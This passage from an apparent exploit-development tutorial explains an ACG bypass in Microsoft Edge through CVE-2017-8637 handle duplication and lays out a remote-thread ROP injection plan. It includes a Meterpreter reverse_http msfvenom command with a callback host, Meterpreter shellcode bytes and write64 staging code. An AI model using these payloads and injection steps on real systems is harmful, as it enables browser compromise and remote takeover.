If we take a look at the description above, the lpTargetHandle will “…receive the duplicate handle…”. What this means is that DuplicateHandle is used in this case to duplicate a handle to the JIT server, and store the duplicated handle within s_jitManager+0x8 (a.k.a the content process will have a handle to the JIT server). We can base this on two things - the first being that we have anecdotal evidence through the name of the variable we located in ChakraCore, which is jitProcessHandle. Although Chakra isn’t identical to ChakraCore in every regard, Chakra is following the same convention here. However, instead of directly supplying the jitProcessHandle, Chakra seems to manage this information through a structure called s_jitManager. The second way we can confirm this is through hard evidence.

If we examine chakra!JITManager::s_jitManager+0x8 (where we have hypothesized the duplicated JIT handle will go) within WinDbg, we can clearly see that this is a handle to a process with PROCESS_DUP_HANDLE access. We can also use Process Hacker to examine the handles to and from MicrosoftEdgeCP.exe. First, run Process Hacker as an administrator. From there, double-click on the MicrosoftEdgeCP.exe content process (the one using the most RAM as we saw, PID 4172 in this case). Then click on the Handles tab and sort the handles numerically by clicking on the Handle column until they are in ascending order.

If we then scroll down in this list of handles, we can see our handle of 0x314. Looking at the Name column, we can also see that this is a handle to another MicrosoftEdgeCP.exe process. Since we know there are only two (whenever exploit.html is spawned and no other tabs are open) instances of MicrosoftEdgeCP.exe, the other “content process” (as we saw earlier) must be our JIT server (PID 7392)!

Another way to confirm this is by clicking on the General tab of our content process (PID 4172). From there, we can click on the Details button next to Mitigation policies to confirm that ACG (called “Dynamic code prohibited” here) is enabled for the content process where our exploit is running.

However, if we look at the other content process (which should be our JIT server) we can confirm ACG is not enabled. This tells us exactly which process is our JIT server and which one is our content process. From now on, no matter how many instances of Edge are running on a given machine, a content process will always have a PROCESS_DUP_HANDLE handle to the JIT server located at chakra!JITManager::s_jitManager+0x8.

So, in summation, we know that s_jitManager+0x8 contains a handle to the JIT server, and it is readable from the content process (where our exploit is running). You may also be asking “why does the content process need to have a PROCESS_DUP_HANDLE handle to the JIT server?” We will come to this shortly.
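
Reading the handle is then just a matter of pulling the 8-byte value at offset 0x8 out of the structure. Here is a minimal Python sketch, assuming we already have the raw bytes of s_jitManager (in the exploit these would come from the arbitrary read primitive). read_qword is a hypothetical helper, and the contents of the first field are a placeholder, since only the +0x8 field matters here.

```python
import struct


def read_qword(memory, offset):
    """Hypothetical helper: read a little-endian 64-bit value from a byte buffer."""
    return struct.unpack_from("<Q", memory, offset)[0]


# Stand-in for the bytes at chakra!JITManager::s_jitManager.
# +0x0: placeholder value, +0x8: the handle value seen in Process Hacker (0x314).
fake_struct = struct.pack("<QQ", 0x4141414141414141, 0x314)

handle = read_qword(fake_struct, 0x8)
print(hex(handle))
```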

Turning our attention back to the aforementioned analysis, we know we have a handle to the JIT server. You may be thinking - we could essentially just use our arbitrary read primitive to obtain this handle and then use it to perform some operations on the JIT process, since the JIT process doesn’t have ACG enabled! This may sound very enticing at first. However, let’s take a look at a malicious function like VirtualAllocEx for a second, which can allocate memory within a remote process via a supplied process handle (which we have). VirtualAllocEx documentation states that:

The handle must have the PROCESS_VM_OPERATION access right. For more information, see Process Security and Access Rights.

This “kills” our idea in its tracks - the handle we have only has the permission PROCESS_DUP_HANDLE. We don’t have the access rights to allocate memory in a remote process where perhaps ACG is disabled (like the JIT server). However, due to a vulnerability (CVE-2017-8637), there is actually a way we can abuse the handle stored within s_jitManager+0x8 (which is a handle to the JIT server). To understand this, let’s just take a few moments to understand why we even need a handle to the JIT server, from the content process, in the first place.
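
The access check that blocks this idea is just a bitmask comparison. Here is a minimal Python sketch, assuming the access-right values from the Windows headers; has_access is a hypothetical helper used for illustration, not a Windows API.

```python
# Process access rights (values as defined in winnt.h).
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040


def has_access(granted, required):
    """Hypothetical helper: True only if every required bit is present in the granted mask."""
    return (granted & required) == required


leaked = PROCESS_DUP_HANDLE  # rights on the handle stored at s_jitManager+0x8

print(has_access(leaked, PROCESS_DUP_HANDLE))    # what DuplicateHandle requires
print(has_access(leaked, PROCESS_VM_OPERATION))  # what VirtualAllocEx requires
```

The first check passes and the second fails, which is why the leaked handle cannot be handed to VirtualAllocEx as-is.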

Let’s now turn our attention to this Google Project Zero issue regarding the CVE.

We know that the JIT server (a different process) needs to map JIT’d code into the content process. As the issue explains:

In order to be able to map executable memory in the calling process, JIT process needs to have a handle of the calling process. So how does it get that handle? It is sent by the calling process as part of the ThreadContext structure. In order to send its handle to the JIT process, the calling process first needs to call DuplicateHandle on its (pseudo) handle.

The above is self-explanatory. If you want to do process injection (e.g. map code into another process) you need a handle to that process. So, in the case of the JIT server - the JIT server knows it is going to need to inject some code into the content process. In order to do this, the JIT server needs a handle to the content process with permissions such as PROCESS_VM_OPERATION. So, in order for the JIT process to have a handle to the content process, the content process (as mentioned above) shares it with the JIT process. However, this is where things get interesting.

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle. According to Microsoft, a pseudo handle:

… is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.

So, in other words, a pseudo handle is a handle to the current process and it is only valid within context of the process it is generated in. So, for example, if the content process called GetCurrentProcess to obtain a pseudo handle which represents the content process (essentially a handle to itself), this pseudo handle wouldn’t be valid within the JIT process. This is because the pseudo handle only represents a handle to the process which called GetCurrentProcess. If GetCurrentProcess is called in the JIT process, the handle generated is only valid within the JIT process. It is just an “easy” way for a process to specify a handle to the current process. If you supplied this pseudo handle in a call to WriteProcessMemory, for instance, you would tell WriteProcessMemory “hey, any memory you are about to write to is found within the current process”. Additionally, this pseudo handle has PROCESS_ALL_ACCESS permissions.

Now that we know what a pseudo handle is, let’s revisit this sentiment:

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle.

What the content process will do is obtain its pseudo handle by calling GetCurrentProcess (which is only valid within the content process). This handle is then used in a call to DuplicateHandle. In other words, the content process will duplicate its pseudo handle. You may be thinking, however, “Connor you just told me that a pseudo handle can only be used by the process which called GetCurrentProcess. Since the content process called GetCurrentProcess, the pseudo handle will only be valid in the content process. We need a handle to the content process that can be used by another process, like the JIT server. How does duplicating the handle change the fact this pseudo handle can’t be shared outside of the content process, even though we are duplicating the handle?”

The answer is pretty straightforward - if we look in the GetCurrentProcess Remarks section we can see the following text:

A process can create a “real” handle to itself that is valid in the context of other processes, or that can be inherited by other processes, by specifying the pseudo handle as the source handle in a call to the DuplicateHandle function.

So, even though the pseudo handle only represents a handle to the current process and is only valid within the current process, the DuplicateHandle function has the ability to convert this pseudo handle, which is only valid within the current process (in our case, the current process is the content process where the pseudo handle to be duplicated exists) into an actual or real handle which can be leveraged by other processes. This is exactly why the content process will duplicate its pseudo handle - it allows the content process to create an actual handle to itself, with PROCESS_ALL_ACCESS permissions, which can be actively used by other processes (in our case, this duplicated handle can be used by the JIT server to map JIT’d code into the content process).

So, in totality, it’s possible for the content process to call GetCurrentProcess (which returns a PROCESS_ALL_ACCESS handle to the content process) and then use DuplicateHandle to duplicate this handle for the JIT server to use. However, where things get interesting is the third parameter of DuplicateHandle, which is hTargetProcessHandle. This parameter has the following description:

A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right…

In our case, we know that the “process that is to receive the duplicated handle” is the JIT server. After all, we are trying to send a (duplicated) content process handle to the JIT server. This means that when the content process calls DuplicateHandle in order to duplicate its handle for the JIT server to use, according to this parameter, the content process also needs to have a handle to the JIT server with PROCESS_DUP_HANDLE. If this doesn’t make sense, re-read the description provided of hTargetProcessHandle. This is saying that this parameter requires a handle to the process where the duplicated handle is going to go (specifically a handle with PROCESS_DUP_HANDLE permissions).

This means, in fewer words, that if the content process wants to call DuplicateHandle in order to send/share its handle to/with the JIT server so that the JIT server can map JIT’d code into the content process, the content process also needs a PROCESS_DUP_HANDLE to the JIT server.

This is the exact reason why the s_jitManager structure in the content process contains a PROCESS_DUP_HANDLE to the JIT server. Since the content process now has a PROCESS_DUP_HANDLE handle to the JIT server (s_jitManager+0x8), this s_jitManager+0x8 handle can be passed in to the hTargetProcessHandle parameter when the content process duplicates its handle via DuplicateHandle for the JIT server to use. So, to answer our initial question - the reason why this handle exists (why the content process has a handle to the JIT server) is so DuplicateHandle calls succeed where content processes need to send their handle to the JIT server!

As a side note, this architecture is no longer used and the issue was fixed according to Ivan:

This issue was fixed by using an undocumented system_handle IDL attribute to transfer the Content Process handle to the JIT Process. This leaves handle passing in the responsibility of the Windows RPC mechanism, so Content Process no longer needs to call DuplicateHandle() or have a handle to the JIT Process.

So, to beat this horse to death, let me concisely reiterate one last time:

  1. JIT process wants to inject JIT’d code into the content process. It needs a handle to the content process to inject this code
  2. In order to fulfill this need, the content process will duplicate its handle and pass it to the JIT server
  3. In order for a duplicated handle from process “A” (the content process) to be used by process “B” (the JIT server), process “B” (the JIT server) first needs to give its handle to process “A” (the content process) with PROCESS_DUP_HANDLE permissions. This is outlined by hTargetProcessHandle which requires “a handle to the process that is to receive the duplicated handle” when the content process calls DuplicateHandle to send its handle to the JIT process
  4. Content process first stores a handle to the JIT server with PROCESS_DUP_HANDLE to fulfill the needs of hTargetProcessHandle
  5. Now that the content process has a PROCESS_DUP_HANDLE to the JIT server, the content process can call DuplicateHandle to duplicate its own handle and pass it to the JIT server
  6. JIT server now has a handle to the content process

The issue with this is number three, as outlined by Microsoft:

A process that has some of the access rights noted here can use them to gain other access rights. For example, if process A has a handle to process B with PROCESS_DUP_HANDLE access, it can duplicate the pseudo handle for process B. This creates a handle that has maximum access to process B. For more information on pseudo handles, see GetCurrentProcess.

What Microsoft is saying here is that if a process has a handle to another process, and that handle has PROCESS_DUP_HANDLE permissions, it is possible to use another call to DuplicateHandle to obtain a full-fledged PROCESS_ALL_ACCESS handle. This is the exact scenario we currently have. Our content process has a PROCESS_DUP_HANDLE handle to the JIT process. As Microsoft points out, this can be dangerous because it is possible to call DuplicateHandle on this PROCESS_DUP_HANDLE handle in order to obtain a full-access handle to the JIT server! This would allow us to have the necessary handle permissions, as we showed earlier with VirtualAllocEx, to compromise the JIT server. The reason why CVE-2017-8637 is an ACG bypass is because the JIT server doesn’t have ACG enabled! If we, from the content process, can allocate memory and write shellcode into the JIT server (abusing this handle) we would compromise the JIT process and execute code, because ACG isn’t enabled there!

So, we could set up a call to DuplicateHandle as such:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// Ignored since we later specify DUPLICATE_SAME_ACCESS
	0,			// FALSE (handle can't be inherited)
	DUPLICATE_SAME_ACCESS	// Create handle with same permissions as source handle (source handle = GetCurrentProcess(), so PROCESS_ALL_ACCESS permissions)
);

Let’s talk about where these parameters came from.

  1. hSourceProcessHandle - “A handle to the process with the handle to be duplicated. The handle must have the PROCESS_DUP_HANDLE access right.”
    • The value we are passing here is jitHandle (which represents our PROCESS_DUP_HANDLE to the JIT server). As the parameter description says, we pass in the handle to the process where the “handle we want to duplicate exists”. Since we are passing in the PROCESS_DUP_HANDLE to the JIT server, this essentially tells DuplicateHandle that the handle we want to duplicate exists somewhere within this process (the JIT process).
  2. hSourceHandle - “The handle to be duplicated. This is an open object handle that is valid in the context of the source process.”
    • We supply a value of GetCurrentProcess here. What this means is that we are asking DuplicateHandle to duplicate a pseudo handle to the current process. In other words, we are asking DuplicateHandle to duplicate us a PROCESS_ALL_ACCESS handle. However, since we have passed in the JIT server as the hSourceProcessHandle parameter we are instead asking DuplicateHandle to “duplicate us a pseudo handle for the current process”, but we have told DuplicateHandle that our “current process” is the JIT process as we have changed our “process context” by telling DuplicateHandle to perform this operation in context of the JIT process. Normally GetCurrentProcess would return us a handle to the process in which the function call occurred (which, in our exploit, will obviously happen within a ROP chain in the content process). However, we use the “trick” up our sleeve, which is the leaked handle to the JIT server we have stored in the content process. When we supply this handle, we “trick” DuplicateHandle into essentially duplicating a PROCESS_ALL_ACCESS handle within the JIT process instead.
  3. hTargetProcessHandle - “A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right.”
    • We supply a value of GetCurrentProcess here. This makes sense, as we want to receive the full handle to the JIT server within the content process. Our exploit is executing within the content process so we tell DuplicateHandle that the process we want to receive this handle in context of is the current, or content process. This will allow the content process to use it later.
  4. lpTargetHandle - “A pointer to a variable that receives the duplicate handle. This handle value is valid in the context of the target process. If hSourceHandle is a pseudo handle returned by GetCurrentProcess or GetCurrentThread, DuplicateHandle converts it to a real handle to a process or thread, respectively.”
    • This is the most important part. First, this is the variable that will receive our handle (fulljitHandle just represents a memory address where we want to store this handle; in our exploit we will just find an empty .data address to store it in). Second, the latter half of the parameter description is equally important. We know that for hSourceHandle we supplied a pseudo handle via GetCurrentProcess. This description essentially says that DuplicateHandle will convert this pseudo handle in hSourceHandle into a real handle when the function completes. As we mentioned, we are using a “trick” with our hSourceProcessHandle being the JIT server and our hSourceHandle being a pseudo handle. We are telling DuplicateHandle to resolve a pseudo handle “to the current process” within the context of the JIT process, so it refers to the JIT process. However, a pseudo handle would really only be usable in the context of the process where it was obtained. So, for instance, if we obtained a pseudo handle to the JIT process it would only be usable within the JIT process. This isn’t ideal, because our exploit is within the content process and any handle that is only usable within the JIT process itself is useless to us. However, since DuplicateHandle will convert the pseudo handle to a real handle, this real handle is usable by other processes. This essentially means our call to DuplicateHandle will provide us with an actual handle with PROCESS_ALL_ACCESS to the JIT server from another process (from the content process in our case).
  5. dwDesiredAccess - “The access requested for the new handle. For the flags that can be specified for each object type, see the following Remarks section. This parameter is ignored if the dwOptions parameter specifies the DUPLICATE_SAME_ACCESS flag…”
    • We will be supplying the DUPLICATE_SAME_ACCESS flag later, meaning we can set this to 0.
  6. bInheritHandle - “A variable that indicates whether the handle is inheritable. If TRUE, the duplicate handle can be inherited by new processes created by the target process. If FALSE, the new handle cannot be inherited.”
    • Here we set the value to FALSE. We don’t need this handle to be inheritable.
  7. dwOptions - “Optional actions. This parameter can be zero, or any combination of the following values.”
    • Here we provide 2, or DUPLICATE_SAME_ACCESS. This instructs DuplicateHandle that we want our duplicate handle to have the same permissions as the handle provided by the source. Since we provided a pseudo handle as the source, which has PROCESS_ALL_ACCESS, our final duplicated handle fulljitHandle will be a real PROCESS_ALL_ACCESS handle to the JIT server which can be used by the content process.
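
Since this call will eventually be made from a ROP chain, it helps to see where each of the seven arguments has to live. The sketch below is a minimal Python illustration of the Microsoft x64 calling convention (first four arguments in RCX, RDX, R8 and R9, the rest on the stack above the 32-byte shadow space). place_args is a hypothetical helper, the value 0x314 is the handle we saw in Process Hacker, and the address used for fulljitHandle is a made-up placeholder.

```python
PSEUDO_HANDLE = 0xFFFFFFFFFFFFFFFF  # (HANDLE)-1 viewed as an unsigned 64-bit value
DUPLICATE_SAME_ACCESS = 0x2

REGISTERS = ["RCX", "RDX", "R8", "R9"]


def place_args(args):
    """Hypothetical helper: map arguments to their x64 locations at function entry."""
    placement = {}
    for index, value in enumerate(args):
        if index < 4:
            placement[REGISTERS[index]] = value
        else:
            # At entry: [RSP] holds the return address and [RSP+0x8..0x27] is
            # shadow space, so the fifth argument sits at [RSP+0x28].
            placement["[RSP+0x%X]" % (0x28 + 8 * (index - 4))] = value
    return placement


JIT_HANDLE = 0x314            # value read from s_jitManager+0x8
FULL_JIT_HANDLE_PTR = 0x1000  # placeholder: address of an empty .data slot

layout = place_args([
    JIT_HANDLE,             # hSourceProcessHandle
    PSEUDO_HANDLE,          # hSourceHandle
    PSEUDO_HANDLE,          # hTargetProcessHandle
    FULL_JIT_HANDLE_PTR,    # lpTargetHandle
    0,                      # dwDesiredAccess (ignored)
    0,                      # bInheritHandle (FALSE)
    DUPLICATE_SAME_ACCESS,  # dwOptions
])
for location, value in layout.items():
    print("%-11s = 0x%X" % (location, value))
```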

If this all sounds confusing, take a few moments to re-read the above. Additionally, here is a summation of what I said:

  1. DuplicateHandle lets you decide in what process the handle you want to duplicate exists. We tell DuplicateHandle that we want to duplicate a handle within the JIT process, using the low-permission PROCESS_DUP_HANDLE handle we have leaked from s_jitManager.
  2. We then tell DuplicateHandle the handle we want to duplicate within the JIT server is a GetCurrentProcess pseudo handle. This handle has PROCESS_ALL_ACCESS.
  3. Although GetCurrentProcess returns a handle only usable by the process which called it, DuplicateHandle will perform a conversion under the hood to convert this to an actual handle which other processes can use
  4. Lastly, we tell DuplicateHandle we want a real handle to the JIT server, which we can use from the content process, with PROCESS_ALL_ACCESS permissions via the DUPLICATE_SAME_ACCESS flag which will tell DuplicateHandle to duplicate the handle with the same permissions as the pseudo handle (which is PROCESS_ALL_ACCESS).
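
To make the trick concrete, here is a toy Python model of per-process handle tables. It is only a sketch of the semantics described above, not how the Windows kernel is implemented: the Process class and the duplicate_handle function are hypothetical, and only the pieces needed for this scenario (the PROCESS_DUP_HANDLE check, pseudo handle resolution and DUPLICATE_SAME_ACCESS) are modeled.

```python
PROCESS_DUP_HANDLE = 0x0040
PROCESS_ALL_ACCESS = 0x1FFFFF
DUPLICATE_SAME_ACCESS = 0x2
PSEUDO_HANDLE = -1  # what GetCurrentProcess() returns


class Process:
    def __init__(self, name):
        self.name = name
        self.handles = {}  # handle value -> (target Process, access mask)
        self._next = 0x4

    def add_handle(self, target, access):
        value = self._next
        self._next += 4
        self.handles[value] = (target, access)
        return value

    def resolve(self, handle):
        """Look up a handle in the context of this process."""
        if handle == PSEUDO_HANDLE:
            return (self, PROCESS_ALL_ACCESS)
        return self.handles[handle]


def duplicate_handle(caller, src_process_handle, src_handle,
                     dst_process_handle, options):
    src_process, src_rights = caller.resolve(src_process_handle)
    dst_process, dst_rights = caller.resolve(dst_process_handle)
    # Both process handles must carry PROCESS_DUP_HANDLE.
    if not (src_rights & PROCESS_DUP_HANDLE and dst_rights & PROCESS_DUP_HANDLE):
        raise PermissionError("PROCESS_DUP_HANDLE required")
    if options != DUPLICATE_SAME_ACCESS:
        raise NotImplementedError("only DUPLICATE_SAME_ACCESS is modeled")
    # The source handle is interpreted in the *source* process's context,
    # so a pseudo handle resolves to the source process itself.
    target, access = src_process.resolve(src_handle)
    return dst_process.add_handle(target, access)


content = Process("content")
jit = Process("jit")
leaked = content.add_handle(jit, PROCESS_DUP_HANDLE)  # s_jitManager+0x8

full = duplicate_handle(content, leaked, PSEUDO_HANDLE,
                        PSEUDO_HANDLE, DUPLICATE_SAME_ACCESS)
target, access = content.handles[full]
print(target.name, hex(access))
```

In this model the content process starts with nothing but a PROCESS_DUP_HANDLE handle to the JIT process and ends with a second entry in its own handle table that points at the JIT process with PROCESS_ALL_ACCESS.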

Again, just keep re-reading over this and thinking about it logically. If you still have questions, feel free to email me. It can get confusing pretty quickly (at least to me).

Now that we are armed with the above information, it is time to start outlining our exploitation plan.

Exploitation Plan 2.0

Let’s briefly take a second to rehash where we are at:

  1. We have an ASLR bypass and we know the layout of memory
  2. We can read/write anywhere in memory as much or as little as we want
  3. We can direct program execution to wherever we want in memory
  4. We know where the stack is and can force Edge to start executing our ROP chain

However, we know the pesky mitigations of ACG, CIG, and “no child processes” are still in our way. We can’t just execute our payload because we can’t make our payload executable. So, with that said, the first option one could take is using a pure data-only attack. We could programmatically, via ROP, build out a reverse shell. This is very cumbersome and could take thousands of ROP gadgets. Although this is always a viable alternative, we want to detonate actual shellcode somehow. So, the approach we will take is as follows:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process
  2. ACG is disabled within the JIT process. Use our ability to execute a ROP chain in the content process to write our payload to the JIT process
  3. Execute our payload within the JIT process to obtain shellcode execution (essentially perform process injection to inject a payload to the JIT process where ACG is disabled)

To break down how we will actually accomplish step 2 in even greater detail, let’s first outline some stipulations about processes protected by ACG. We know that the content process (where our exploit will execute) is protected by ACG. We know that the JIT server is not protected by ACG. We already know that a process not protected by ACG is allowed to inject into a process that is protected by ACG. We clearly see this with the out-of-process JIT architecture of Edge. The JIT server (not protected by ACG) injects code into the content process (protected by ACG) - this is expected behavior. However, what about an injection from a process that is protected by ACG into a process that is not protected by ACG (e.g. injection from the content process into the JIT process, which we are attempting to do)?

This is actually prohibited (with a slight caveat). A process that is protected by ACG is not allowed to directly inject RWX memory and execute it within a process not protected by ACG. This makes sense, as this stipulation “protects” against an attacker compromising the JIT process (ACG disabled) from the content process (ACG enabled). However, we mentioned the stipulation is only that we cannot directly embed our shellcode as RWX memory and directly execute it via a process injection call stack like VirtualAllocEx (allocate RWX memory within the JIT process) -> WriteProcessMemory -> CreateRemoteThread (execute the RWX memory in the JIT process). However, there is a way we can bypass this stipulation.

Instead of directly allocating RWX memory within the JIT process (from the content process) we could instead just write a ROP chain into the JIT process. This doesn’t require RWX memory, and only requires RW memory. Then, if we could somehow hijack control-flow of the JIT process, we could have the JIT process execute our ROP chain. Since ACG is disabled in the JIT process, our ROP chain could mark our shellcode as RWX instead of directly doing it via VirtualAllocEx! Essentially, our ROP chain would just be a “traditional” one used to bypass DEP in the JIT process. This would allow us to bypass ACG! This is how our exploit chain would look:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process (this allows us to invoke memory operations on the JIT server from the content process)
  2. Allocate memory within the JIT process via VirtualAllocEx and the above handle
  3. Write our final shellcode (a reflective DLL from Meterpreter) into the allocation (our shellcode is now in the JIT process as RW)
  4. Create a thread within the JIT process via CreateRemoteThread, but create this thread as suspended so it doesn’t execute and have the start/entry point of our thread be a ret ROP gadget
  5. Dump the CONTEXT structure of the thread we just created (and now control) in the JIT process via GetThreadContext to retrieve its stack pointer (RSP)
  6. Use WriteProcessMemory to write the “final” ROP chain into the JIT process by leveraging the leaked stack pointer (RSP) of the thread we control in the JIT process from our call to GetThreadContext. Since we know where the stack is for our thread we created, from GetThreadContext, we can directly write a ROP chain to it with WriteProcessMemory and our handle to the JIT server. This ROP chain will mark our shellcode, which we already injected into the JIT process, as RWX (this ROP chain will work just like any traditional ROP chain that calls VirtualProtect)
  7. Update the instruction pointer of the thread we control to return into our ROP chain
  8. Call ResumeThread. This call will kick off execution of our thread, which has its entry point set to a return routine to start executing off of the stack, where our ROP chain is
  9. Our ROP chain will mark our shellcode as RWX and will jump to it and execute it
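
To give a feel for what step 6 actually writes onto the remote thread’s stack, here is a rough Python sketch that packs a generic VirtualProtect-style chain into bytes. Everything about it is an assumption for illustration: the gadget and function addresses are made-up placeholders, it assumes simple pop-register gadgets exist for all four argument registers, and it ignores stack alignment and Control Flow Guard. It is not the chain used later in this blog post.

```python
import struct

PAGE_EXECUTE_READWRITE = 0x40

# All addresses below are made-up placeholders for illustration only.
POP_RCX_RET = 0x7FF000001000
POP_RDX_RET = 0x7FF000002000
POP_R8_RET = 0x7FF000003000
POP_R9_RET = 0x7FF000004000
VIRTUAL_PROTECT = 0x7FF000005000
SHELLCODE = 0x20000000        # where step 3 wrote the payload (RW)
SHELLCODE_SIZE = 0x1000
OLD_PROTECT_PTR = 0x20100000  # any writable address


def build_virtualprotect_chain():
    """Return the raw bytes to write at the hijacked thread's stack pointer."""
    qwords = [
        POP_RCX_RET, SHELLCODE,              # RCX = lpAddress
        POP_RDX_RET, SHELLCODE_SIZE,         # RDX = dwSize
        POP_R8_RET, PAGE_EXECUTE_READWRITE,  # R8  = flNewProtect
        POP_R9_RET, OLD_PROTECT_PTR,         # R9  = lpflOldProtect
        VIRTUAL_PROTECT,                     # enter VirtualProtect via ret
        SHELLCODE,                           # its return address: jump to the payload
        0, 0, 0, 0,                          # shadow space the callee may overwrite
    ]
    return struct.pack("<%dQ" % len(qwords), *qwords)


chain = build_virtualprotect_chain()
print(len(chain), "bytes to pass to WriteProcessMemory")
```

Because the thread’s entry point is a ret gadget, resuming it pops the first qword of this buffer into the instruction pointer, and the chain runs from there.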

Lastly, I want to quickly point out the old Advanced Windows Exploitation syllabus from Offensive Security. After reading the steps outlined in this syllabus, I was able to formulate my aforementioned exploitation path off of the groundwork laid here. Although the syllabus I read was succinct and concise, I learned while developing my exploit that Control Flow Guard checks some additional things, which led to many more ROP chains than I would have liked. As this blog post goes on, I will explain my thought process as to what I thought would work and what actually worked.

If the above steps seem a bit confusing - do not worry. We will dedicate a section to each concept in the rest of the blog post. You have gotten through a wall of text and, if you have made it to this point, you should have a general understanding of what we are trying to accomplish. Let’s now start implementing this into our exploit. We will start with our shellcode.

Shellcode

The first thing we need to decide is what kind of shellcode we want to execute. What we will do is store our shellcode in the .data section of chakra.dll within the content process. This is so we know its location when it comes time to inject it into the JIT process. So, before we begin our ROP chain, we need to load our shellcode into the content process so we can inject it into the JIT process. A typical example of a reverse shell, on Windows, is as follows:

  1. Create an instance of cmd.exe
  2. Use the socket library of the Windows API to put the I/O for cmd.exe on a socket, making the cmd.exe session remotely accessible over a network connection.

We can see this within the Metasploit Framework

Here is the issue - within Edge, we know there is a “no child processes” mitigation. Since a reverse shell requires spawning an instance of cmd.exe from the code calling it (our exploit), we can’t just use a normal reverse shell. Another way we could load code into the process space is through a DLL. However, remember that even though ACG is disabled in the JIT process, the JIT process still has Code Integrity Guard (CIG) enabled - meaning we can’t just use our payload to download a DLL to disk and then load it with LoadLibraryA. Let’s take a closer look at how Microsoft documents CIG, specifically in the Mitigation Bypass and Bounty for Defense Terms. If we scroll down to the “Code integrity mitigations” section, we can see what Microsoft deems to be out-of-scope.

If the image above is hard to view, open it in a new tab. As we can see, Microsoft says that “in-memory injection” is out-of-scope for bypassing CIG. This means Microsoft knows this is an issue that CIG doesn’t address. There is a well-known technique called reflective DLL injection, where an adversary uses pure shellcode (a very large blob of shellcode) to load an entire DLL (which is not signed by Microsoft) in memory, without ever touching disk. Red teamers have beaten this concept to death, so I am not going to go in-depth here. Just know that we need to use reflective DLL injection because we need a payload which doesn’t spawn other processes.

Most command-and-control frameworks, like the one we will use (Meterpreter), use reflective DLL injection for their post-exploitation capabilities. There are two ways to approach this - staged and stageless. A stageless payload is a huge blob of shellcode that contains not only the DLL itself, but also a routine that injects that DLL into memory. The alternative is a staged payload, which uses a small first-stage shellcode that calls out to a command-and-control server to fetch the DLL to be injected. For our purposes, we will be using a staged reflective DLL for our shellcode.

To put it more simply - we will be using the windows/x64/meterpreter/reverse_http payload from Metasploit. Essentially, you can opt to inject any shellcode which doesn’t fork a new process.

The shellcode can be generated as follows: msfvenom -p windows/x64/meterpreter/reverse_http LHOST=YOUR_SERVER_IP LPORT=443 -f c

What I am about to explain next is (arguably) the most arduous part of this exploit. We know that, in our exploit, JavaScript limits us to 32-bit boundaries when reading and writing. This means we have to write our shellcode 4 bytes at a time, so we need to divide our shellcode into 4-byte “segments”. I did this manually at first, but later figured out how to partially automate getting the shellcode into the correct format.

To “automate” this, we first need to get our shellcode into one contiguous line. Save the shellcode from the msfvenom output in a file named shellcode.txt.

Once the shellcode is in shellcode.txt, we can use the following one liner:

awk '{printf "%s""",$0}' shellcode.txt | sed 's/"//g' | sed 's/;//g' | sed 's/$/0000/' |  sed -re 's/\\x//g1' | fold -w 2 | tac | tr -d "\n" | sed 's/.\{8\}/& /g' | awk '{ for (i=NF; i>1; i--) printf("%s ",$i); print $1; }' | awk '{ for(i=1; i<=NF; i+=2) print $i, $(i+1) }' | sed 's/ /, /g' | sed 's/[^ ]* */0x&/g' | sed 's/^/write64(chakraLo+0x74b000+countMe, chakraHigh, /' | sed 's/$/);/' | sed 's/$/\ninc();/'

This will take our shellcode and divide it into four byte segments, remove the \x characters, get them in little endian format, and put them in a format where they will more easily be ready to be placed into our exploit.
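
For readers who would rather not depend on a shell pipeline, the same transformation can be sketched in JavaScript. This is only an illustration, not the method used in this post: packShellcode, dword, and toWrite64Lines are hypothetical helper names, and the input is assumed to be a plain array of byte values taken from the msfvenom output. Unlike the one-liner, this sketch pads the tail with NULL bytes to a full 8 bytes on its own.

```javascript
// Hypothetical helper: pack raw shellcode bytes into [low, high] DWORD pairs,
// little endian, padding the tail with NULL bytes to a multiple of 8 bytes.
function packShellcode(bytes) {
    const padded = bytes.slice();
    while (padded.length % 8 !== 0) {
        padded.push(0x00);
    }

    const view = new DataView(new Uint8Array(padded).buffer);
    const pairs = [];
    for (let off = 0; off < padded.length; off += 8) {
        pairs.push([view.getUint32(off, true), view.getUint32(off + 4, true)]);
    }
    return pairs;
}

// Hypothetical helper: format one DWORD as 0x followed by 8 hex digits
function dword(x) {
    return "0x" + x.toString(16).padStart(8, "0");
}

// Emit lines in the same shape as the one-liner's output
function toWrite64Lines(bytes) {
    return packShellcode(bytes).map(([lo, hi]) =>
        "write64(chakraLo+0x74b000+countMe, chakraHigh, " + dword(lo) + ", " + dword(hi) + ");\ninc();"
    ).join("\n");
}

// First 16 bytes of the payload shown in this post
const firstBytes = [0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00,
                    0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51];
console.log(toWrite64Lines(firstBytes));
```

Running this on the full byte array should give the same write64/inc pairs as the pipeline, with the final pair already padded.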

Your output should look something like this:

write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
inc();
